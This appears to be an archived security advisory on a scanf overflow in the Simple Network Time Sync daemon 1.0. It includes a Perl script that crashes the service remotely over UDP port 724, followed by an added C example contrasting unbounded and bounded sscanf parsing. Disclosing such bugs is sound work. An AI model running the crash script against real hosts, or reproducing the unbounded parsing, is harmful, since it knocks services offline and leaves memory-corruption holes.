Simple Network Time Sync overflow, possibly exploitable

    Simple Network Time Sync


    'logistix' found the following.  He noticed an uncommon scanf
    overflow in the Simple Network Time Sync daemon and client version
    1.0, tested on Red Hat 6.1.  He hasn't looked into this fully yet,
    but it looks as though it could be root compromising, as it sits
    on a privileged UDP port and seems to coredump, but it looks like
    it only gives you 50 chars to run code with.  He included some
    Perl here which will crash it remotely by sending it a string over
    50 chars.

    #!/usr/bin/perl -w
    # Usage: ./kill_sntsd <hostname>
    use Socket;
    send_packet(); # Needs to send 2 packets to kill the client and the server daemons
    sub send_packet {
        $proto = getprotobyname('udp');
        $localaddr = gethostbyname("localhost") || die "error: $!\n";
        $iaddr = gethostbyname($ARGV[0]) || die "$!\n";
        $sin = sockaddr_in(724, $iaddr);       # destination: UDP port 724 on the target
        $paddr = sockaddr_in(53, $localaddr);  # local source address and port
        socket(SH, PF_INET, SOCK_DGRAM, $proto);
        bind(SH, $paddr);
        connect(SH, $sin) || die "$!\n";
        # A string longer than 50 characters...
        print SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix";
    }
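
The bug class described above, as an added example: this is not code from the original report or from the Simple Network Time Sync source, which the page does not show. It contrasts an unbounded scanf conversion with a width-limited one that rejects oversized input; the function names, FIELD_MAX and MAX_PKT are assumptions, with the 50-byte buffer taken from the "50 chars" in the report.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 49              /* usable chars; assumed from "50 chars" in the report */
#define FIELD_LEN (FIELD_MAX + 1) /* plus the terminating NUL */
#define MAX_PKT   512             /* assumed upper bound on a datagram */
#define STR_(x) #x
#define STR(x)  STR_(x)

/* Unsafe pattern, shown for contrast and never called here: "%s" has no
 * field width, so a token longer than FIELD_MAX writes past field[]. */
int parse_unbounded(const char *text, char field[FIELD_LEN])
{
    return sscanf(text, "%s", field) == 1 ? 0 : -1;
}

/* Bounded form. pkt/len are the raw datagram bytes (not NUL-terminated).
 * Returns 0 on success, -1 if no token is present, -2 if the datagram or
 * its first token is too long (rejected instead of silently truncated). */
int parse_bounded(const char *pkt, size_t len, char field[FIELD_LEN])
{
    char text[MAX_PKT + 1];
    int used = 0;

    if (len > MAX_PKT)
        return -2;
    memcpy(text, pkt, len);
    text[len] = '\0';                      /* sscanf needs a C string */

    /* "%49s" stores at most 49 chars plus NUL; %n records bytes consumed. */
    if (sscanf(text, "%" STR(FIELD_MAX) "s%n", field, &used) != 1)
        return -1;
    /* A non-space byte right after the token means it was cut at 49. */
    if (text[used] != '\0' && !isspace((unsigned char)text[used]))
        return -2;
    return 0;
}

int main(void)
{
    char field[FIELD_LEN], big[56];        /* constructed 56-byte datagram */
    memset(big, 'A', sizeof big);
    printf("short: %d\n", parse_bounded("sync", 4, field));
    printf("long:  %d\n", parse_bounded(big, sizeof big, field));
    return 0;
}
```

Deriving the width in the format string from the same macro as the buffer size keeps the two from drifting apart when the buffer is resized.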


    Nothing yet.
